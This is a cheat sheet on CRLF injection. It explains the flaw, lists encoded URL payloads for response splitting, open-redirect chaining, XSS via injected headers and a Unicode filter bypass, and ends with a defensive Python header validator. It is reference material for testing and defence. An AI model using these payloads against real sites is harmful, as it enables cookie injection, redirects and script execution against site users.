CRLF Injection
CRLF (Carriage Return Line Feed) Injection occurs when an attacker gets carriage return (%0D) and line feed (%0A) characters into user input that the server copies into an HTTP response header. Because CRLF marks the end of a header line, the injected sequence terminates that header and lets the attacker append further headers or body content, controlling the rest of the server's output.
When a browser sends a request to a web server, the server answers with a response containing both the HTTP response headers and the actual website content; the two are separated by an empty line (a double CRLF), which is why injected CRLFs are so powerful.
- HTTP Response Splitting
Check whether the response now sets this cookie:
/%0D%0ASet-Cookie:mycookie=myvalue
- CRLF chained with Open Redirect
//www.google.com/%2F%2E%2E%0D%0AHeader-Test:test2
/www.google.com/%2E%2E%2F%0D%0AHeader-Test:test2
/google.com/%2F..%0D%0AHeader-Test:test2
/%0d%0aLocation:%20http://example.com
- CRLF Injection to XSS
/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23
/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
- Filter Bypass
%E5%98%8A = %0A = \u560a
%E5%98%8D = %0D = \u560d
%E5%98%BE = %3E = \u563e (>)
%E5%98%BC = %3C = \u563c (<)
Payload = %E5%98%8A%E5%98%8DSet-Cookie:%20test
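As an added, defender-side example that is not part of the original notes, the following Python validates header values and redirect targets against the payload classes listed above: raw %0D%0A response splitting, the Location-based open redirect chain, and the Unicode low-byte filter bypass (%E5%98%8A decodes to U+560A, whose low byte is 0x0A). The function names are my own and assume the application copies user input into a response header such as Location.

```python
# Added defensive example, not from the original notes. Assumption: the
# application places user input into a response header (e.g. Location).
from urllib.parse import unquote, urlsplit

CR, LF = 0x0D, 0x0A


def has_crlf(raw: str) -> bool:
    """True if the percent-decoded value contains CR/LF directly, or as a
    wide character whose low byte is CR/LF (%E5%98%8A -> U+560A -> 0x0A)."""
    for ch in unquote(raw):
        cp = ord(ch)
        if cp in (CR, LF) or (cp > 0xFF and (cp & 0xFF) in (CR, LF)):
            return True
    return False


def safe_header_value(raw: str) -> str:
    """Percent-decode once and allow only printable ASCII, which rejects
    raw CRLF and the Unicode bypass alike; raises ValueError otherwise."""
    if has_crlf(raw):
        raise ValueError("CR/LF in header value")
    value = unquote(raw)
    if not all(0x20 <= ord(c) < 0x7F for c in value):
        raise ValueError("non-printable or non-ASCII byte in header value")
    return value


def safe_redirect_location(raw: str) -> str:
    """A redirect target must be a same-site path: no scheme, no //host or
    /\\host (blocks the //www.google.com/... chain) and no '..' segment."""
    value = safe_header_value(raw)
    parts = urlsplit(value)
    if (parts.scheme or parts.netloc or not value.startswith("/")
            or value[1:2] in ("/", "\\")):
        raise ValueError("redirect target must be a same-site path")
    if ".." in parts.path.split("/"):
        raise ValueError("path traversal in redirect target")
    return value


def is_safe_redirect(raw: str) -> bool:
    """Boolean wrapper for use in a WAF rule or request filter."""
    try:
        safe_redirect_location(raw)
        return True
    except ValueError:
        return False
```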
- crlfuzz